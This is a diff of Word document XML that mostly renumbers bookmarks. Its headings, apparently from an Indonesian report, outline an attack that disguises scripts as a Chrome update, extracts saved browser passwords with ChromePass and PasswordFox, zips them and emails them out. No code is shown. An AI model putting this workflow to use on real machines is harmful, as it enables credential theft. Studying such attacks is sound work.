+      <w:bookmarkStart w:id="82" w:name="_Toc43087607"/>
+      <w:bookmarkStart w:id="83" w:name="_Toc43087901"/>
+      <w:bookmarkStart w:id="84" w:name="_Toc43258878"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -30864,9 +30862,9 @@
         </w:rPr>
         <w:t>. Baris perintah membuka CMD sebagai admin</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="82"/>
       <w:bookmarkEnd w:id="83"/>
       <w:bookmarkEnd w:id="84"/>
-      <w:bookmarkEnd w:id="85"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -31366,9 +31364,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="86" w:name="_Toc43087608"/>
-      <w:bookmarkStart w:id="87" w:name="_Toc43087902"/>
-      <w:bookmarkStart w:id="88" w:name="_Toc43258879"/>
+      <w:bookmarkStart w:id="85" w:name="_Toc43087608"/>
+      <w:bookmarkStart w:id="86" w:name="_Toc43087902"/>
+      <w:bookmarkStart w:id="87" w:name="_Toc43258879"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -31437,9 +31435,9 @@
         </w:rPr>
         <w:t>untuk Membuat Folder</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="85"/>
       <w:bookmarkEnd w:id="86"/>
       <w:bookmarkEnd w:id="87"/>
-      <w:bookmarkEnd w:id="88"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -31775,9 +31773,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="89" w:name="_Toc43087609"/>
-      <w:bookmarkStart w:id="90" w:name="_Toc43087903"/>
-      <w:bookmarkStart w:id="91" w:name="_Toc43258880"/>
+      <w:bookmarkStart w:id="88" w:name="_Toc43087609"/>
+      <w:bookmarkStart w:id="89" w:name="_Toc43087903"/>
+      <w:bookmarkStart w:id="90" w:name="_Toc43258880"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -31829,9 +31827,9 @@
         </w:rPr>
         <w:t>. Baris Perintah untuk Mengunduh File dari Github</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="88"/>
       <w:bookmarkEnd w:id="89"/>
       <w:bookmarkEnd w:id="90"/>
-      <w:bookmarkEnd w:id="91"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -32402,9 +32400,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="92" w:name="_Toc43087610"/>
-      <w:bookmarkStart w:id="93" w:name="_Toc43087904"/>
-      <w:bookmarkStart w:id="94" w:name="_Toc43258881"/>
+      <w:bookmarkStart w:id="91" w:name="_Toc43087610"/>
+      <w:bookmarkStart w:id="92" w:name="_Toc43087904"/>
+      <w:bookmarkStart w:id="93" w:name="_Toc43258881"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -32482,9 +32480,9 @@
         </w:rPr>
         <w:t>Execution Policy</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="91"/>
       <w:bookmarkEnd w:id="92"/>
       <w:bookmarkEnd w:id="93"/>
-      <w:bookmarkEnd w:id="94"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -33072,9 +33070,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="95" w:name="_Toc43087611"/>
-      <w:bookmarkStart w:id="96" w:name="_Toc43087905"/>
-      <w:bookmarkStart w:id="97" w:name="_Toc43258882"/>
+      <w:bookmarkStart w:id="94" w:name="_Toc43087611"/>
+      <w:bookmarkStart w:id="95" w:name="_Toc43087905"/>
+      <w:bookmarkStart w:id="96" w:name="_Toc43258882"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -33137,9 +33135,9 @@
         </w:rPr>
         <w:t>Tools</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="94"/>
       <w:bookmarkEnd w:id="95"/>
       <w:bookmarkEnd w:id="96"/>
-      <w:bookmarkEnd w:id="97"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -33899,9 +33897,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="98" w:name="_Toc43087612"/>
-      <w:bookmarkStart w:id="99" w:name="_Toc43087906"/>
-      <w:bookmarkStart w:id="100" w:name="_Toc43258883"/>
+      <w:bookmarkStart w:id="97" w:name="_Toc43087612"/>
+      <w:bookmarkStart w:id="98" w:name="_Toc43087906"/>
+      <w:bookmarkStart w:id="99" w:name="_Toc43258883"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -33953,7 +33951,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. Baris Perintah untuk </w:t>
       </w:r>
-      <w:bookmarkEnd w:id="98"/>
+      <w:bookmarkEnd w:id="97"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -33982,8 +33980,8 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="98"/>
       <w:bookmarkEnd w:id="99"/>
-      <w:bookmarkEnd w:id="100"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -34597,9 +34595,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="101" w:name="_Toc43087613"/>
-      <w:bookmarkStart w:id="102" w:name="_Toc43087907"/>
-      <w:bookmarkStart w:id="103" w:name="_Toc43258884"/>
+      <w:bookmarkStart w:id="100" w:name="_Toc43087613"/>
+      <w:bookmarkStart w:id="101" w:name="_Toc43087907"/>
+      <w:bookmarkStart w:id="102" w:name="_Toc43258884"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -34661,9 +34659,9 @@
         </w:rPr>
         <w:t>Script</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="100"/>
       <w:bookmarkEnd w:id="101"/>
       <w:bookmarkEnd w:id="102"/>
-      <w:bookmarkEnd w:id="103"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -34684,7 +34682,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="104" w:name="_Toc43262079"/>
+      <w:bookmarkStart w:id="103" w:name="_Toc43264847"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -34699,7 +34697,7 @@
         </w:rPr>
         <w:t>Script</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="104"/>
+      <w:bookmarkEnd w:id="103"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35024,9 +35022,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="105" w:name="_Toc43087614"/>
-      <w:bookmarkStart w:id="106" w:name="_Toc43087908"/>
-      <w:bookmarkStart w:id="107" w:name="_Toc43258885"/>
+      <w:bookmarkStart w:id="104" w:name="_Toc43087614"/>
+      <w:bookmarkStart w:id="105" w:name="_Toc43087908"/>
+      <w:bookmarkStart w:id="106" w:name="_Toc43258885"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35096,9 +35094,9 @@
         </w:rPr>
         <w:t>ChromeUpdateDownload.ps1</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="104"/>
       <w:bookmarkEnd w:id="105"/>
       <w:bookmarkEnd w:id="106"/>
-      <w:bookmarkEnd w:id="107"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35560,9 +35558,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="108" w:name="_Toc43087615"/>
-      <w:bookmarkStart w:id="109" w:name="_Toc43087909"/>
-      <w:bookmarkStart w:id="110" w:name="_Toc43258886"/>
+      <w:bookmarkStart w:id="107" w:name="_Toc43087615"/>
+      <w:bookmarkStart w:id="108" w:name="_Toc43087909"/>
+      <w:bookmarkStart w:id="109" w:name="_Toc43258886"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35632,9 +35630,9 @@
         </w:rPr>
         <w:t xml:space="preserve"> zipping.ps1</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="107"/>
       <w:bookmarkEnd w:id="108"/>
       <w:bookmarkEnd w:id="109"/>
-      <w:bookmarkEnd w:id="110"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35657,14 +35655,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="111" w:name="_Toc43262080"/>
+      <w:bookmarkStart w:id="110" w:name="_Toc43264848"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Menjalankan ChromePass dan PasswordFox</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="111"/>
+      <w:bookmarkEnd w:id="110"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35816,9 +35814,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="112" w:name="_Toc43087616"/>
-      <w:bookmarkStart w:id="113" w:name="_Toc43087910"/>
-      <w:bookmarkStart w:id="114" w:name="_Toc43258887"/>
+      <w:bookmarkStart w:id="111" w:name="_Toc43087616"/>
+      <w:bookmarkStart w:id="112" w:name="_Toc43087910"/>
+      <w:bookmarkStart w:id="113" w:name="_Toc43258887"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35906,9 +35904,9 @@
         </w:rPr>
         <w:t xml:space="preserve"> yang Diambil oleh ChromePass</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="111"/>
       <w:bookmarkEnd w:id="112"/>
       <w:bookmarkEnd w:id="113"/>
-      <w:bookmarkEnd w:id="114"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35987,9 +35985,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="115" w:name="_Toc43087617"/>
-      <w:bookmarkStart w:id="116" w:name="_Toc43087911"/>
-      <w:bookmarkStart w:id="117" w:name="_Toc43258888"/>
+      <w:bookmarkStart w:id="114" w:name="_Toc43087617"/>
+      <w:bookmarkStart w:id="115" w:name="_Toc43087911"/>
+      <w:bookmarkStart w:id="116" w:name="_Toc43258888"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -36041,9 +36039,9 @@
         </w:rPr>
         <w:t>. Username dan Password yang Diambil oleh PasswordFox</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="114"/>
       <w:bookmarkEnd w:id="115"/>
       <w:bookmarkEnd w:id="116"/>
-      <w:bookmarkEnd w:id="117"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -36066,7 +36064,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="118" w:name="_Toc43262081"/>
+      <w:bookmarkStart w:id="117" w:name="_Toc43264849"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -36081,7 +36079,7 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="118"/>
+      <w:bookmarkEnd w:id="117"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37539,9 +37537,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="119" w:name="_Toc43087618"/>
-      <w:bookmarkStart w:id="120" w:name="_Toc43087912"/>
-      <w:bookmarkStart w:id="121" w:name="_Toc43258889"/>
+      <w:bookmarkStart w:id="118" w:name="_Toc43087618"/>
+      <w:bookmarkStart w:id="119" w:name="_Toc43087912"/>
+      <w:bookmarkStart w:id="120" w:name="_Toc43258889"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -37603,9 +37601,9 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="118"/>
       <w:bookmarkEnd w:id="119"/>
       <w:bookmarkEnd w:id="120"/>
-      <w:bookmarkEnd w:id="121"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37648,7 +37646,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="122" w:name="_Toc43262082"/>
+      <w:bookmarkStart w:id="121" w:name="_Toc43264850"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -37656,31 +37654,31 @@
         <w:lastRenderedPageBreak/>
         <w:t>Pengujian Sistem Dan Analisis</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="121"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="122" w:name="_Toc43264851"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pengujian Sistem</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="122"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="123" w:name="_Toc43262083"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Pengujian Sistem</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="123"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37733,7 +37731,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="124" w:name="_Toc43262084"/>
+      <w:bookmarkStart w:id="123" w:name="_Toc43264852"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -37746,7 +37744,7 @@
         </w:rPr>
         <w:t>Membuat Folder Baru</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="124"/>
+      <w:bookmarkEnd w:id="123"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37867,7 +37865,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="125" w:name="_Toc43258890"/>
+      <w:bookmarkStart w:id="124" w:name="_Toc43258890"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -37919,7 +37917,7 @@
         </w:rPr>
         <w:t>. Membuka CMD Sebagai Admin</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="125"/>
+      <w:bookmarkEnd w:id="124"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37994,7 +37992,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="126" w:name="_Toc43258891"/>
+      <w:bookmarkStart w:id="125" w:name="_Toc43258891"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38046,7 +38044,7 @@
         </w:rPr>
         <w:t>. Masuk ke dalam CMD Sebagai Admin</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="126"/>
+      <w:bookmarkEnd w:id="125"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38227,7 +38225,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="127" w:name="_Toc43258892"/>
+      <w:bookmarkStart w:id="126" w:name="_Toc43258892"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38296,7 +38294,7 @@
         </w:rPr>
         <w:t>Baru</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="127"/>
+      <w:bookmarkEnd w:id="126"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38448,7 +38446,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="128" w:name="_Toc43258893"/>
+      <w:bookmarkStart w:id="127" w:name="_Toc43258893"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38500,7 +38498,7 @@
         </w:rPr>
         <w:t>. Folder Baru Berhasil Dibuat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="128"/>
+      <w:bookmarkEnd w:id="127"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38519,7 +38517,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="129" w:name="_Toc43262085"/>
+      <w:bookmarkStart w:id="128" w:name="_Toc43264853"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -38540,7 +38538,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> dari Github</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="129"/>
+      <w:bookmarkEnd w:id="128"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38735,7 +38733,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="130" w:name="_Toc43258894"/>
+      <w:bookmarkStart w:id="129" w:name="_Toc43258894"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38821,7 +38819,7 @@
         </w:rPr>
         <w:t>b.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="130"/>
+      <w:bookmarkEnd w:id="129"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38884,7 +38882,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="131" w:name="_Toc43258895"/>
+      <w:bookmarkStart w:id="130" w:name="_Toc43258895"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38954,7 +38952,7 @@
         </w:rPr>
         <w:t>b.ps1 Berhasil Dibuat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="131"/>
+      <w:bookmarkEnd w:id="130"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39120,7 +39118,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="132" w:name="_Toc43258896"/>
+      <w:bookmarkStart w:id="131" w:name="_Toc43258896"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -39210,7 +39208,7 @@
         </w:rPr>
         <w:t>Execution Policy</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="132"/>
+      <w:bookmarkEnd w:id="131"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39329,7 +39327,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="133" w:name="_Toc43258897"/>
+      <w:bookmarkStart w:id="132" w:name="_Toc43258897"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -39399,7 +39397,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> dari Github</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="133"/>
+      <w:bookmarkEnd w:id="132"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39418,7 +39416,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="134" w:name="_Toc43262086"/>
+      <w:bookmarkStart w:id="133" w:name="_Toc43264854"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -39433,7 +39431,7 @@
         </w:rPr>
         <w:t>Browser</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="134"/>
+      <w:bookmarkEnd w:id="133"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39625,7 +39623,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="135" w:name="_Toc43258898"/>
+      <w:bookmarkStart w:id="134" w:name="_Toc43258898"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -39677,7 +39675,7 @@
         </w:rPr>
         <w:t>. Perintah Menjalankan Program</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="135"/>
+      <w:bookmarkEnd w:id="134"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39963,7 +39961,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="136" w:name="_Toc43258899"/>
+      <w:bookmarkStart w:id="135" w:name="_Toc43258899"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40033,7 +40031,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> pada Google Chrome</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="136"/>
+      <w:bookmarkEnd w:id="135"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40103,7 +40101,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="137" w:name="_Toc43258900"/>
+      <w:bookmarkStart w:id="136" w:name="_Toc43258900"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40173,7 +40171,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> pada Mozilla Firefox</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="137"/>
+      <w:bookmarkEnd w:id="136"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40413,7 +40411,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="138" w:name="_Toc43258901"/>
+      <w:bookmarkStart w:id="137" w:name="_Toc43258901"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40483,7 +40481,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> .txt</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="138"/>
+      <w:bookmarkEnd w:id="137"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40663,7 +40661,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="139" w:name="_Toc43258902"/>
+      <w:bookmarkStart w:id="138" w:name="_Toc43258902"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40715,7 +40713,7 @@
         </w:rPr>
         <w:t>. Tampilan Saat ChromePass.exe Dijalankan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="139"/>
+      <w:bookmarkEnd w:id="138"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40777,7 +40775,7 @@
         <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:bookmarkStart w:id="140" w:name="_Hlk43225207"/>
+      <w:bookmarkStart w:id="139" w:name="_Hlk43225207"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -40866,7 +40864,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> seperti pada Gambar V-14 berikut.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="140"/>
+      <w:bookmarkEnd w:id="139"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40945,7 +40943,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="141" w:name="_Toc43258903"/>
+      <w:bookmarkStart w:id="140" w:name="_Toc43258903"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40997,7 +40995,7 @@
         </w:rPr>
         <w:t>. Tampilan Saat PasswordFox.exe Dijalankan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="141"/>
+      <w:bookmarkEnd w:id="140"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41261,7 +41259,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="142" w:name="_Toc43258904"/>
+      <w:bookmarkStart w:id="141" w:name="_Toc43258904"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -41323,7 +41321,7 @@
         </w:rPr>
         <w:t>Password</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="142"/>
+      <w:bookmarkEnd w:id="141"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41341,7 +41339,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="143" w:name="_Toc43262087"/>
+      <w:bookmarkStart w:id="142" w:name="_Toc43264855"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -41362,7 +41360,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Folder</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="143"/>
+      <w:bookmarkEnd w:id="142"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41552,7 +41550,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="144" w:name="_Toc43258905"/>
+      <w:bookmarkStart w:id="143" w:name="_Toc43258905"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -41622,7 +41620,7 @@
         </w:rPr>
         <w:t>.txt</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="144"/>
+      <w:bookmarkEnd w:id="143"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41800,7 +41798,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="145" w:name="_Toc43258906"/>
+      <w:bookmarkStart w:id="144" w:name="_Toc43258906"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -41852,7 +41850,7 @@
         </w:rPr>
         <w:t>. Baris Perintah Menjalankan zipping.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="145"/>
+      <w:bookmarkEnd w:id="144"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41987,7 +41985,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="146" w:name="_Toc43258907"/>
+      <w:bookmarkStart w:id="145" w:name="_Toc43258907"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -42057,7 +42055,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Password.zip Berhasil Dibuat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="146"/>
+      <w:bookmarkEnd w:id="145"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42073,7 +42071,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="147" w:name="_Toc43262088"/>
+      <w:bookmarkStart w:id="146" w:name="_Toc43264856"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -42088,7 +42086,7 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="147"/>
+      <w:bookmarkEnd w:id="146"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42221,7 +42219,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="148" w:name="_Toc43258908"/>
+      <w:bookmarkStart w:id="147" w:name="_Toc43258908"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -42273,7 +42271,7 @@
         </w:rPr>
         <w:t>. Baris Perintah Menjalankan maintenance.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="148"/>
+      <w:bookmarkEnd w:id="147"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42419,7 +42417,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="149" w:name="_Toc43258909"/>
+      <w:bookmarkStart w:id="148" w:name="_Toc43258909"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -42489,7 +42487,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Berhasil Dikirimkan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="149"/>
+      <w:bookmarkEnd w:id="148"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42512,14 +42510,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="150" w:name="_Toc43262089"/>
+      <w:bookmarkStart w:id="149" w:name="_Toc43264857"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Pengujian Menghapus Folder</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="150"/>
+      <w:bookmarkEnd w:id="149"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42624,7 +42622,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="151" w:name="_Toc43258910"/>
+      <w:bookmarkStart w:id="150" w:name="_Toc43258910"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -42676,7 +42674,7 @@
         </w:rPr>
         <w:t>. Baris Perintah Mengakhiri Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="151"/>
+      <w:bookmarkEnd w:id="150"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42799,14 +42797,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="152" w:name="_Toc43262090"/>
+      <w:bookmarkStart w:id="151" w:name="_Toc43264858"/>
       <w:r>
         <w:rPr>
